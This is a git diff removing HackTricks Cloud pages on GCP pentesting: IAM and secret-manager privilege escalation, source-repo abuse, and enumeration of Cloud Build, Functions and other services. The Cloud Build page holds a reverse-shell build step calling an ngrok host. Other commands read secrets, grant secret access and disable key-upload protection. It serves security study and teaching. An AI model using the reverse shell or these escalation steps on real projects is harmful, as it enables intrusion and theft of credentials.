- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## resourcemanager - -### `resourcemanager.organizations.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. - -### `resourcemanager.folders.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. - -### `resourcemanager.projects.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md deleted file mode 100644 index 9f5c5a7d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Secretmanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## secretmanager - -For more information about secretmanager: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -As this is also a post exploitation technique it can be found in: - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### `secretmanager.secrets.setIamPolicy` - -This give you access to give you access to read the secrets from the secret manager, like using: - -```bash -gcloud secrets add-iam-policy-binding \ - --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ - --role="roles/secretmanager.secretAccessor" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md deleted file mode 100644 index 8ef9a508e..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Sourcerepos Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### `source.repos.get` - -With this permission it's possible to download the repository locally: - -```bash -gcloud source repos clone --project= -``` - -### `source.repos.update` - -A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like: - -* Owner -* Editor -* Source Repository Administrator (`roles/source.admin`) -* Source Repository Writer (`roles/source.writer`) - -To write just perform a regular **`git push`**. - -### `source.repos.setIamPolicy` - -With this permission an attacker could grant himself the previous permissions. - -### Secret access - -If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check: - -{% content-ref url="gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Add SSH keys - -It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh\_keys](https://source.cloud.google.com/user/ssh_keys) - -Once your ssh key is set, you can access a repo with: - -{% code overflow="wrap" %} -```bash -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -``` -{% endcode %} - -And then use **`git`** commands are per usual. - -### Manual Credentials - -It's possible to create manual credentials to access the Source Repositories: - -
- -Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3) - -Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this. - -This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`** - -
- -Executing the script you can then use git clone, push... and it will work. - -### `source.repos.updateProjectConfig` - -With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys: - -```bash -gcloud source project-configs update --disable-pushblock -``` - -You can also configure a different pub/sub topic or even disable it completely: - -```bash -gcloud source project-configs update --remove-topic=REMOVE_TOPIC -gcloud source project-configs update --remove-topic=UPDATE_TOPIC -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md deleted file mode 100644 index abbec6712..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - AI Platform Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) - -Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**. - -There are a few areas here you can look for interesting information like models and jobs. - -```bash -# Models -gcloud ai-platform models list -gcloud ai-platform models describe -gcloud ai-platform models get-iam-policy - -# Jobs -gcloud ai-platform jobs list -gcloud ai-platform jobs describe -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md deleted file mode 100644 index 0b4eea5f9..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - API Keys Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data. - -### Restrictions - -You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP. - -### Enumeration - -It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe: - -```bash -gcloud services api-keys list -gcloud services api-keys describe -gcloud services api-keys list --show-deleted -``` - -{% hint style="info" %} -It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys. -{% endhint %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %} -[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %} -[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md deleted file mode 100644 index 4cb12e714..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Batch Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations. - -### Service Account - -Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually). - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List jobs -gcloud batch jobs list - -# Get job info -gcloud batch jobs describe --location - -# List tasks -gcloud batch tasks list --location --job - -# Gte info of tasks executions -gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/ -``` -{% endcode %} - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %} -[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md deleted file mode 100644 index 7d8c2c5e7..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md +++ /dev/null @@ -1,58 +0,0 @@ -# GCP - Bigtable Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) - -A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). - -```bash -# Cloud Bigtable -gcloud bigtable instances list -gcloud bigtable instances describe -gcloud bigtable instances get-iam-policy - -## Clusters -gcloud bigtable clusters list -gcloud bigtable clusters describe - -## Backups -gcloud bigtable backups list --instance -gcloud bigtable backups describe --instance -gcloud bigtable backups get-iam-policy --instance - -## Hot Tables -gcloud bigtable hot-tablets list - -## App Profiles -gcloud bigtable app-profiles list --instance -gcloud bigtable app-profiles describe --instance -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md deleted file mode 100644 index 18aef35d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md +++ /dev/null @@ -1,199 +0,0 @@ -# GCP - Cloud Build Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows. - -Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab). - -{% hint style="success" %} -I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client. -{% endhint %} - -### Events - -The Cloud Build can be triggered if: - -* **Push to a branch**: Specify the branch -* **Push a new tag**: Specify the tag -* P**ull request**: Specify the branch that receives the PR -* **Manual Invocation** -* **Pub/Sub message:** Specify the topic -* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret - -### Execution - -There are 3 options: - -* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml` - * Only one that can be specified “inline” in the web console and in the cli - * Most common option - * Relevant for unauthenticated access -* A **Dockerfile** to build -* A **Buildpack** to build - -### SA Permissions - -The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.** - -By default no permissions are given but it's fairly easy to give it some: - -
- -### Approvals - -It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default). - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -### Connections & Repositories - -Connections can be created over: - -* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.** -* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret. -* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.** - -Once a connection is generated, you can use it to **link repositories that the Github account has access** to. - -This option is available through the button: - -
- -{% hint style="success" %} -Note that repositories connected with this method are **only available in Triggers using 2nd generation.** -{% endhint %} - -### Connect a Repository - -This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).** - -This option is available through the button: - -
- -### Storage - -Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with: - -```bash -git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \ - cd cloud-console-sample-build && \ - gcloud builds submit --config cloudbuild.yaml --region=global -``` - -A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used. - -### Get shell - -```yaml -steps: - - name: bash - script: | - #!/usr/bin/env bash - bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1 -options: - logging: CLOUD_LOGGING_ONLY -``` - -Install gcloud inside cloud build: - -```bash -# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image -curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz -mkdir -p /usr/local/gcloud -tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz -/usr/local/gcloud/google-cloud-sdk/install.sh -``` - -### Enumeration - -You could find **sensitive info in build configs and logs**. - -```bash -# Get configured triggers configurations -gcloud builds triggers list # Check for the words github and bitbucket -gcloud builds triggers describe - -# Get build executions -gcloud builds list -gcloud builds describe # Get even the build yaml if defined in there -gcloud builds log # Get build logs - -# List all connections of each region -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build connections in region: $region" - connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}") - if [[ ${#connections[@]} -eq 0 ]]; then - echo "No connections found in region $region." - else - for connection in $connections; do - echo "Describing connection $connection in region $region" - gcloud builds connections describe "$connection" --region="$region" - echo "-----------------------------------------" - done - fi - echo "=========================================" -done - -# List all worker-pools -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build worker-pools in region: $region" - gcloud builds worker-pools list --region="$region" - echo "-----------------------------------------" -done -``` - -### Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %} -[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %} -[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %} -[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md deleted file mode 100644 index f12757734..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md +++ /dev/null @@ -1,135 +0,0 @@ -# GCP - Cloud Functions Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize. - -### Storage - -The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\ -The code is stored in a bucket like one of the following: - -* `gcf-sources--/-/version-/function-source.zip` -* `gcf-v2-sources--/function-source.zip` - -For example:\ -`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip` - -{% hint style="warning" %} -Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**. -{% endhint %} - -### Artifact Registry - -If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check: - -{% content-ref url="gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### SA - -If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function. - -### Triggers, URL & Authentication - -When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\ -Other triggers are pub/sub, Storage, Filestore... - -The URL format is **`https://-.cloudfunctions.net/`** - -When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it: - -
